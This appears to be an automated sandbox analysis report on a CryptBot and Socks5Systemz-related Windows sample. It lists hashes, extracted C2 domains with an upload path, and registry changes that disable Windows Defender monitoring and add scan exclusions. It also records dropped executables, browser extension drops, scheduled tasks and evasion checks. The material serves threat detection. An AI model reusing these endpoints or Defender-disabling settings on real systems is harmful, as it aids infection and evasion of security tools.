Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
27-09-2024 15:51
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20240802-en
General
-
Target
file.exe
-
Size
5KB
-
MD5
72025394a2450241bce7df7e305cd07b
-
SHA1
018b6c066c915ba37616661f86c09e453d58fd66
-
SHA256
69b153cd6176d790d2aae37ccc5600bde475a0eca6d1f6f531a1e040d44bccd1
-
SHA512
80b6dd62149a49cb849a148b4d5501765302f21696056d91789ba46a18aa8ecc7fb6f14569787dae716a975327d2fbb518212ab0de195588ff568da60e816fa2
-
SSDEEP
48:6iHpgJkhMKfgrJ/J4KK4SRcMnZbECSaM7/ttOuliL/qXSfbNtm:TH+zCgdinZbq/Z0LxzNt
Malware Config
Extracted
cryptbot
fivevh5ht.top
analforeverlovyu.top
-
url_path
/v1/upload.php
Signatures
-
Detect Socks5Systemz Payload 1 IoCs
resource yara_rule behavioral1/memory/776-210-0x0000000002E70000-0x0000000002F12000-memory.dmp family_socks5systemz -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HpnMghYRHBUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RDPbNEzdUsgCtKDC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GfzXWCCsFRMrC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RDPbNEzdUsgCtKDC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XgywPJLnIuIbRuigTDR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RDPbNEzdUsgCtKDC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HpnMghYRHBUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bvOaypMPnvJU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bvOaypMPnvJU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RDPbNEzdUsgCtKDC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VVgdUZLbU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XgywPJLnIuIbRuigTDR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\VhLijRxUJlqjyVVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GfzXWCCsFRMrC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\VhLijRxUJlqjyVVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VVgdUZLbU = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 40 1332 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 1812 powershell.exe 2592 powershell.exe 1280 powershell.EXE 536 powershell.exe 2624 powershell.exe 2940 powershell.exe 2228 powershell.EXE 1584 powershell.EXE 668 powershell.exe 2912 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\International\Geo\Nation glADGjJ.exe -
Executes dropped EXE 13 IoCs
pid Process 2716 setup.exe 2964 Install.exe 2704 Install.exe 2120 Channel2.exe 1728 stories.exe 760 stories.tmp 776 gerdaplay3se32.exe 1604 service123.exe 2956 service123.exe 2636 NcfwarB.exe 2040 CheckTool.exe 2092 service123.exe 2336 glADGjJ.exe -
Indirect Command Execution 1 TTPs 19 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 2996 forfiles.exe 1584 forfiles.exe 2768 forfiles.exe 2840 forfiles.exe 2128 forfiles.exe 1384 forfiles.exe 2884 forfiles.exe 2924 forfiles.exe 484 forfiles.exe 2440 forfiles.exe 344 forfiles.exe 2428 forfiles.exe 372 forfiles.exe 2164 forfiles.exe 1832 forfiles.exe 2864 forfiles.exe 1268 forfiles.exe 1608 forfiles.exe 3068 forfiles.exe -
Loads dropped DLL 36 IoCs
pid Process 2716 setup.exe 2716 setup.exe 2716 setup.exe 2716 setup.exe 2964 Install.exe 2964 Install.exe 2964 Install.exe 2964 Install.exe 2704 Install.exe 2704 Install.exe 2704 Install.exe 1728 stories.exe 760 stories.tmp 760 stories.tmp 760 stories.tmp 760 stories.tmp 2120 Channel2.exe 2120 Channel2.exe 1604 service123.exe 2956 service123.exe 2092 service123.exe 2556 WerFault.exe 2556 WerFault.exe 2556 WerFault.exe 1332 rundll32.exe 1332 rundll32.exe 1332 rundll32.exe 1332 rundll32.exe 2508 WerFault.exe 2508 WerFault.exe 2508 WerFault.exe 2508 WerFault.exe 1144 WerFault.exe 1144 WerFault.exe 1144 WerFault.exe 2508 WerFault.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 141.98.234.31 -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json glADGjJ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json glADGjJ.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA glADGjJ.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6DA548C7E5915679F87E910D6581DEF1_64D0E789CB701290BBA99483C478F9FE glADGjJ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol glADGjJ.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA glADGjJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6DA548C7E5915679F87E910D6581DEF1_64D0E789CB701290BBA99483C478F9FE glADGjJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_2DF9D35AB0D2482BD840A671B3E7EAEE glADGjJ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini NcfwarB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6DA548C7E5915679F87E910D6581DEF1_058F778FC8346DE378B15A5652BAADD9 glADGjJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6DA548C7E5915679F87E910D6581DEF1_058F778FC8346DE378B15A5652BAADD9 glADGjJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_2DF9D35AB0D2482BD840A671B3E7EAEE glADGjJ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol NcfwarB.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini NcfwarB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat glADGjJ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 glADGjJ.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol NcfwarB.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 glADGjJ.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\VVgdUZLbU\HvhCbph.xml glADGjJ.exe File created C:\Program Files (x86)\bvOaypMPnvJU2\CAbfsRC.xml glADGjJ.exe File created C:\Program Files (x86)\XgywPJLnIuIbRuigTDR\vDWAity.dll glADGjJ.exe File created C:\Program Files (x86)\XgywPJLnIuIbRuigTDR\abqMryD.xml glADGjJ.exe File created C:\Program Files (x86)\GfzXWCCsFRMrC\RFuAtgv.dll glADGjJ.exe File created C:\Program Files (x86)\VVgdUZLbU\JgmlqI.dll glADGjJ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi glADGjJ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja glADGjJ.exe File created C:\Program Files (x86)\HpnMghYRHBUn\xnxdhIA.dll glADGjJ.exe File created C:\Program Files (x86)\GfzXWCCsFRMrC\hxcDbaK.xml glADGjJ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi glADGjJ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak glADGjJ.exe File created C:\Program Files (x86)\bvOaypMPnvJU2\SJogTmtlpqAIr.dll glADGjJ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\fTWiavJbWOFnfXaJS.job schtasks.exe File created C:\Windows\Tasks\bHuqaEPbhrVtHIaGbF.job schtasks.exe File created C:\Windows\Tasks\FjXDdrejgGyCBhByH.job schtasks.exe File created C:\Windows\Tasks\PNYixZeXsqZpVKW.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2556 2636 WerFault.exe 73 2508 2704 WerFault.exe 34 1144 2336 WerFault.exe 237 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gerdaplay3se32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NcfwarB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Channel2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Channel2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Channel2.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" NcfwarB.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-7e-48-cd-dd-56\WpadDecisionTime = 401a3a5bf510db01 glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs glADGjJ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs glADGjJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs glADGjJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-7e-48-cd-dd-56\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs glADGjJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" glADGjJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix glADGjJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-7e-48-cd-dd-56 